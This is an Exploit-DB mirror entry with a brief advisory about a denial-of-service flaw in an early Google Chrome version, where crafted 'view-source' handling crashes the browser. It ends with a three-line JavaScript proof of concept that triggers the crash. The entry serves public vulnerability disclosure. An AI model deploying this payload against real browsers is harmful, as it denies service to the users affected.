exploit-db-mirror/exploits/multiple/dos/32335.js
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

12 lines
No EOL
463 B
JavaScript

source: https://www.securityfocus.com/bid/31035/info
Google Chrome is prone to a remote denial-of-service vulnerability because the application fails to handle specially crafted HTTP 'view-source' headers.
Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
Google Chrome 0.2.149.27 is vulnerable; other versions may also be affected.
<script>
a = window.open("view-source:http://123")
a.alert(1)
</script>